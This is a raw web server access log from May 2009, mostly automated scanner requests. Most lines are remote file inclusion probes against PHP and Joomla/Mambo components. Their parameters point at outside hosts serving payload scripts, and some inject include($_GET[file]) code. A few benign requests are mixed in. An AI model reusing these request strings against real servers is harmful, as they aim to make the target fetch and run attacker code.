58.227.193.198 - - [16/May/2009:03:16:50 -0400] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:16:50 -0400] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:03:16:51 -0400] "GET /logs/access_log.Q108120800%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:17:27 -0400] "GET /logs/access_log.Q108090200//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
72.249.65.226 - - [16/May/2009:03:18:20 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
72.249.65.226 - - [16/May/2009:03:18:20 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
72.249.65.226 - - [16/May/2009:03:18:20 -0400] "GET /logs/access_log.Q108101100//include/admin.lib.inc.php?site_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.42.135.240 - - [16/May/2009:03:18:28 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
72.42.135.240 - - [16/May/2009:03:18:28 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
72.42.135.240 - - [16/May/2009:03:18:32 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
72.42.135.240 - - [16/May/2009:03:18:32 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
85.214.86.93 - - [16/May/2009:03:18:44 -0400] "GET //skin/zero_vote/error.php?dir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:03:18:44 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:03:18:44 -0400] "GET /logs/access_log.Q108100900%20%20//skin/zero_vote/error.php?dir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
72.249.65.226 - - [16/May/2009:03:18:53 -0400] "GET /logs/access_log.Q108091300//include/admin.lib.inc.php?site_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
190.144.44.36 - - [16/May/2009:03:18:54 -0400] "GET /logs/access_log.Q108102500/s_loadenv.inc.php?DOCUMENT_ROOT=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
72.249.65.226 - - [16/May/2009:03:19:27 -0400] "GET /logs/access_log.Q108101100%20%20//include/admin.lib.inc.php?site_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
222.122.26.5 - - [16/May/2009:03:19:42 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
222.122.26.5 - - [16/May/2009:03:19:42 -0400] "GET /logs/access_log.Q108101100//include/admin.lib.inc.php?site_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.122.26.5 - - [16/May/2009:03:19:43 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
72.249.65.226 - - [16/May/2009:03:19:49 -0400] "GET /logs/access_log.Q108091300%20%20//include/admin.lib.inc.php?site_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
72.30.79.49 - - [16/May/2009:03:19:59 -0400] "GET /logs/access_log.Q109012400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.122.26.5 - - [16/May/2009:03:20:42 -0400] "GET /logs/access_log.Q108091300//include/admin.lib.inc.php?site_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:03:20:47 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:03:20:48 -0400] "GET /logs/access_log.Q108081700%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:03:20:48 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
195.5.168.93 - - [16/May/2009:03:20:53 -0400] "GET /index.php?option=com_datsogallery&Itemid=54&func=detail&catid=14&id=85//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
195.5.168.93 - - [16/May/2009:03:20:53 -0400] "GET /logs/index.php?option=com_datsogallery&Itemid=54&func=detail&catid=14&id=85//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
195.5.168.93 - - [16/May/2009:03:20:53 -0400] "GET /logs/access_log.Q108120600/index.php?option=com_datsogallery&Itemid=54&func=detail&catid=14&id=85//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.5.168.93 - - [16/May/2009:03:20:53 -0400] "GET /logs/index.php?option=com_datsogallery&Itemid=54&func=detail&catid=14&id=85//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
195.5.168.93 - - [16/May/2009:03:20:53 -0400] "GET /logs/access_log.Q108120600/index.php?option=com_datsogallery&Itemid=54&func=detail&catid=14&id=85//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.5.168.93 - - [16/May/2009:03:20:53 -0400] "GET /index.php?option=com_datsogallery&Itemid=54&func=detail&catid=14&id=85//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
209.59.12.99 - - [16/May/2009:03:21:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.249.36.194 - - [16/May/2009:03:23:25 -0400] "GET /index.php?option=com_datsogallery&Itemid=54&func=detail&catid=14&id=85//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.249.36.194 - - [16/May/2009:03:23:25 -0400] "GET /logs/access_log.Q108120600%20%20/index.php?option=com_datsogallery&Itemid=54&func=detail&catid=14&id=85//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.249.36.194 - - [16/May/2009:03:23:25 -0400] "GET /logs/index.php?option=com_datsogallery&Itemid=54&func=detail&catid=14&id=85//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:03:23:46 -0400] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 223 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:03:23:46 -0400] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
222.122.26.5 - - [16/May/2009:03:24:14 -0400] "GET /logs/access_log.Q108101100%20%20//include/admin.lib.inc.php?site_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.249.36.194 - - [16/May/2009:03:24:46 -0400] "GET /logs/access_log.Q108120600/index.php?option=com_datsogallery&Itemid=54&func=detail&catid=14&id=85//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
190.144.44.36 - - [16/May/2009:03:24:47 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
190.144.44.36 - - [16/May/2009:03:24:47 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
190.144.44.36 - - [16/May/2009:03:24:47 -0400] "GET /logs/access_log.Q108120700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
190.144.44.36 - - [16/May/2009:03:25:07 -0400] "GET /logs/access_log.Q109032800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
79.188.187.18 - - [16/May/2009:03:25:26 -0400] "GET /logs/access_log.Q108080900//s_loadenv.inc.php?DOCUMENT_ROOT=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
91.206.183.148 - - [16/May/2009:03:25:41 -0400] "GET /logs/access_log.Q108122100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
91.206.183.148 - - [16/May/2009:03:25:41 -0400] "GET /logs/access_log.Q108060500//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
200.32.100.130 - - [16/May/2009:03:25:43 -0400] "GET /logs/access_log.Q109051200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
200.32.100.130 - - [16/May/2009:03:25:43 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
200.32.100.130 - - [16/May/2009:03:25:43 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
79.188.187.18 - - [16/May/2009:03:25:59 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
69.172.92.14 - - [16/May/2009:03:26:11 -0400] "GET /logs/access_log.Q108121300//classes/adodbt/sql.php?classes_dir=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:03:26:11 -0400] "GET //classes/adodbt/sql.php?classes_dir=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:03:26:11 -0400] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
190.144.44.36 - - [16/May/2009:03:26:14 -0400] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 223 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
190.144.44.36 - - [16/May/2009:03:26:14 -0400] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
87.106.135.14 - - [16/May/2009:03:26:21 -0400] "GET /logs/access_log.Q108121300//classes/adodbt/sql.php?classes_dir=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:03:26:21 -0400] "GET //classes/adodbt/sql.php?classes_dir=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:03:26:21 -0400] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
78.143.46.123 - - [16/May/2009:03:26:23 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
78.143.46.123 - - [16/May/2009:03:26:25 -0400] "GET /logs/error_log.Q108112100//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
190.144.44.36 - - [16/May/2009:03:26:26 -0400] "GET /logs/access_log.Q108120700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
78.143.46.123 - - [16/May/2009:03:26:26 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
88.84.128.40 - - [16/May/2009:03:26:31 -0400] "GET /logs/access_log.Q108121300//classes/adodbt/sql.php?classes_dir=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:03:26:32 -0400] "GET //classes/adodbt/sql.php?classes_dir=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:03:26:32 -0400] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
190.144.44.36 - - [16/May/2009:03:26:34 -0400] "GET /logs/access_log.Q109032800%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [16/May/2009:03:26:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.32.100.130 - - [16/May/2009:03:26:49 -0400] "GET /logs/access_log.Q109040700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
78.143.46.123 - - [16/May/2009:03:27:16 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
78.143.46.123 - - [16/May/2009:03:27:31 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
78.143.46.123 - - [16/May/2009:03:27:39 -0400] "GET /logs/error_log.Q108112100//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:03:27:43 -0400] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:03:27:43 -0400] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 223 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
208.52.167.208 - - [16/May/2009:03:28:06 -0400] "GET /logs/access_log.Q108061000//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 292 "-" "libwww-perl/5.805"
208.52.167.208 - - [16/May/2009:03:28:06 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
208.52.167.208 - - [16/May/2009:03:28:06 -0400] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 270 "-" "libwww-perl/5.805"
72.249.65.226 - - [16/May/2009:03:28:07 -0400] "GET /logs/access_log.Q108082100//include/admin.lib.inc.php?site_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.249.65.226 - - [16/May/2009:03:28:07 -0400] "GET /logs/access_log.Q108100900//include/admin.lib.inc.php?site_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
208.52.167.208 - - [16/May/2009:03:28:08 -0400] "GET /logs/access_log.Q108100700//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 292 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:03:28:10 -0400] "GET /logs/access_log.Q108112900//classes/adodbt/sql.php?classes_dir=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
69.172.92.14 - - [16/May/2009:03:28:29 -0400] "GET /logs/access_log.Q108112900//classes/adodbt/sql.php?classes_dir=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:03:28:30 -0400] "GET /logs/access_log.Q108112900//classes/adodbt/sql.php?classes_dir=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.803"
222.122.26.5 - - [16/May/2009:03:28:49 -0400] "GET /logs/access_log.Q108100900//include/admin.lib.inc.php?site_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.122.26.5 - - [16/May/2009:03:28:49 -0400] "GET /logs/access_log.Q108082100//include/admin.lib.inc.php?site_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.32.100.130 - - [16/May/2009:03:29:17 -0400] "GET /logs/access_log.Q109051200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
190.144.44.36 - - [16/May/2009:03:29:18 -0400] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 223 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
190.144.44.36 - - [16/May/2009:03:29:18 -0400] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 228 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
72.52.255.82 - - [16/May/2009:03:29:20 -0400] "GET /errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:03:29:20 -0400] "GET /logs/errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
62.44.79.35 - - [16/May/2009:03:29:31 -0400] "GET //?path%5Bdocroot%5D=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
62.44.79.35 - - [16/May/2009:03:29:31 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 200 1557 "-" "Mozilla/5.0"
62.44.79.35 - - [16/May/2009:03:29:31 -0400] "GET /logs/access_log.Q108121100%20%20//?path%5Bdocroot%5D=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.32.100.130 - - [16/May/2009:03:29:40 -0400] "GET /logs/access_log.Q109040700%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
62.44.79.35 - - [16/May/2009:03:29:40 -0400] "GET /logs/access_log.Q108111700%20%20//?path%5Bdocroot%5D=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:03:29:59 -0400] "GET /akocomments.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:03:29:59 -0400] "GET /logs/access_log.Q108061500/akocomments.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:03:29:59 -0400] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:03:30:04 -0400] "GET /akocomments.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:03:30:04 -0400] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
124.0.54.98 - - [16/May/2009:03:30:06 -0400] "GET //?path%5Bdocroot%5D=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
124.0.54.98 - - [16/May/2009:03:30:07 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 200 1557 "-" "Mozilla/5.0"
124.0.54.98 - - [16/May/2009:03:30:07 -0400] "GET /logs/access_log.Q108111700%20%20//?path%5Bdocroot%5D=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:03:30:07 -0400] "GET /logs/access_log.Q108061500%20%20/akocomments.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:03:30:12 -0400] "GET /akocomments.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:03:30:12 -0400] "GET /logs/access_log.Q108061500/akocomments.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:03:30:12 -0400] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
208.52.167.208 - - [16/May/2009:03:30:14 -0400] "GET /logs/access_log.Q108110900%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 293 "-" "libwww-perl/5.805"
72.52.230.168 - - [16/May/2009:03:30:15 -0400] "GET /logs/access_log.Q109012400/akocomments.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:03:30:18 -0400] "GET /logs/access_log.Q109012400%20%20/akocomments.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:30:24 -0400] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:30:24 -0400] "GET /logs/access_log.Q108061500/akocomments.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:30:24 -0400] "GET /akocomments.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:03:30:50 -0400] "GET /logs/access_log.Q108100900//skin/zero_vote/error.php?dir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:30:57 -0400] "GET /logs/access_log.Q109012400/akocomments.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
124.0.54.98 - - [16/May/2009:03:31:40 -0400] "GET /logs/access_log.Q108082000%20%20//?path%5Bdocroot%5D=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:31:44 -0400] "GET /akocomments.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:31:44 -0400] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:31:44 -0400] "GET /logs/error_log.Q108061500%20%20/akocomments.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
209.59.12.99 - - [16/May/2009:03:31:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.223.3.98 - - [16/May/2009:03:32:01 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
